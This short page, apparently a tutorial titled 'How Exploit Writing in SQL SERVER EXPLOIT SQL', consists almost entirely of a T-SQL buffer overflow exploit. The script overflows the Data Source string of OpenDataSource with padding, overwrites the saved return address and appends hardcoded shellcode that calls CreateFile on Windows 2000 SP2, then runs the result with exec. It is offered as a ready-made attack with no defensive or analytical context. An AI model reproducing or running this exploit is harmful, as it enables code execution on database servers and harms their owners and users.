How Exploit Writing in SQL SERVER EXPLOIT SQL


declare @exploit nvarchar(4000) 
declare @padding nvarchar(2000) 
declare @saved_return_address nvarchar(20) 
declare @code nvarchar(1000) 
declare @pad nvarchar(16) 
declare @cnt int 
declare @more_pad nvarchar(100) 
select @cnt = 0 
select @padding = 0x41414141 
select @pad = 0x4141 
while @cnt < 1063 
begin 

                                select @padding = @padding + @pad 

                                select @cnt = @cnt + 1 

end 
-- overwrite the saved return address 

select @saved_return_address = 0xDCC9B042 
select @more_pad = 0x4343434344444444454545454646464647474747 

-- code to call CreateFile(). The address is hardcoded to 0x77E86F87 - Win2K Sp2 
 -- change if running a different service pack 

select @code = 0x558BEC33C05068542D424F6844534A4568514C2D4F68433A5C538D142450504050485050B0C05052B8876FE877FFD0CCCCCCCCCC 
select @exploit = N'SELECT * FROM OpenDataSource( ''Microsoft.Jet.OLEDB.4.0'',''Data Source="c:\' 
select @exploit = @exploit + @padding + @saved_return_address + @more_pad + @code 
select @exploit = @exploit + N'";User ID=Admin;Password=;Extended properties=Excel 5.0'')...xactions' 
exec (@exploit)